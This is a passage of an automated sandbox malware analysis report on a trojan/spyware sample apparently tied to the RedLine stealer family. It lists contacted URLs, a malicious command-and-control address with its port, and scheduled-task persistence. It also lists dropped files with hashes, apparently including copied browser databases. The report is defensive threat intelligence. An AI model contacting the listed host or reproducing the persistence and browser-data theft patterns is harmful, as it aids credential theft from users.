                    http://tempuri.org/Endpoint/GetUpdatesLjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ac.ecosia.org/autocomplete?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • URL Reputation: safe
                    unknown
                    https://api.ipify.orgcookies//settinString.RemovegRgIbrhxoEx.exe, RgIbrhxoEx.exe, 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressingRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://185.222.57.151:55615RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/Endpoint/GetUpdatesResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2337066239.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.drfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponseRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/Endpoint/VerifyUpdateRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/0RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRgIbrhxoEx.exe, 00000000.00000002.2133067683.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000A.00000002.2217562708.0000000003226000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RgIbrhxoEx.exe, 00000008.00000002.2249959676.00000000040DA000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2249959676.0000000004260000.00000004.00000800.00020000.00000000.sdmp, tmp8A31.tmp.14.dr, tmp666D.tmp.8.dr, tmpC059.tmp.14.dr, tmpC018.tmp.14.dr, tmpF5A4.tmp.14.dr, tmp3123.tmp.8.dr, tmpF593.tmp.14.dr, tmp9B9B.tmp.8.dr, tmp9BAB.tmp.8.dr, tmp9B6A.tmp.8.dr, tmp3112.tmp.8.dr, tmpC028.tmp.14.dr, tmp8A01.tmp.14.dr, tmpD02C.tmp.8.dr, tmp9B8A.tmp.8.dr, tmpF5F4.tmp.14.dr, tmp665D.tmp.8.dr, tmp9BBC.tmp.8.dr, tmpD01B.tmp.8.drfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/soap/actor/nextRgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    185.222.57.151 | unknown | Netherlands | | 51447 | ROOTLAYERNETNL | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483367
                    Start date and time:2024-07-27 04:11:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 14s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:19
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:RgIbrhxoEx.exe
                    renamed because original name is a hash value
                    Original Sample Name:304ea6d5cf3786d19de14f004d7d057a.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@21/103@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 111
                    • Number of non-executed functions: 13
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    04:12:07 | Task Scheduler | Run new task: LjGABleGAy path: C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    22:12:00 | API Interceptor | 43x Sleep call for process: RgIbrhxoEx.exe modified
                    22:12:06 | API Interceptor | 34x Sleep call for process: powershell.exe modified
                    22:12:09 | API Interceptor | 41x Sleep call for process: LjGABleGAy.exe modified
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    ROOTLAYERNETNL | LisectAVT_2403002A_369.exe | malicious | PureLog Stealer | 45.137.22.173
                    ROOTLAYERNETNL | LisectAVT_2403002A_70.exe | malicious | PureLog Stealer | 45.137.22.173
                    ROOTLAYERNETNL | fOgI44YEok.exe | malicious | PureLog Stealer, RedLine | 45.137.22.242
                    ROOTLAYERNETNL | WKRej3JIRi.exe | malicious | RedLine | 185.222.57.147
                    ROOTLAYERNETNL | svEEudloxo.exe | malicious | RedLine | 185.222.57.153
                    ROOTLAYERNETNL | owKQ0b029a.exe | malicious | RedLine | 185.222.57.67
                    ROOTLAYERNETNL | 8LcFUXH9xN.exe | malicious | RedLine | 185.222.57.74
                    ROOTLAYERNETNL | 0h6tTGKedZ.exe | malicious | RedLine | 185.222.57.153
                    ROOTLAYERNETNL | SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf | malicious | FormBook | 45.137.22.78
                    ROOTLAYERNETNL | PO2767.xls | malicious | FormBook | 45.137.22.78
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1216
                    Entropy (8bit):5.34331486778365
                    Encrypted:false
                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1216
                    Entropy (8bit):5.34331486778365
                    Encrypted:false
                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                    Malicious:true
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2232
                    Entropy (8bit):5.379401388151058
                    Encrypted:false
                    SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
                    MD5:AF15464AFD6EB7D301162A1DC8E01662
                    SHA1:A974B8FEC71BF837B8E72FE43AB43E447FC43A86
                    SHA-256:103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
                    SHA-512:7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
                    Malicious:false
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1583
                    Entropy (8bit):5.106323257825316
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpaxvn:cgergYrFdOFzOzN33ODOiDdKrsuTpuv
                    MD5:39766B4AA3168A72ACCA756EA2737FE0
                    SHA1:099DABEC596D6157E46EF7C86E72B0B979F018EA
                    SHA-256:3947CB85CC890D9F03CB448E3466C6F66E861D72F550DEA44D39B0047725CF07
                    SHA-512:FE1DAA54774FC8643AA3B2DEA04D7D65B5A72C94FB941E840A1B330F62551379F7865B0593B21A7590FF17964C6C11F4C2383D4AAE888932A8C049FC4A4798F0
                    Malicious:true
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
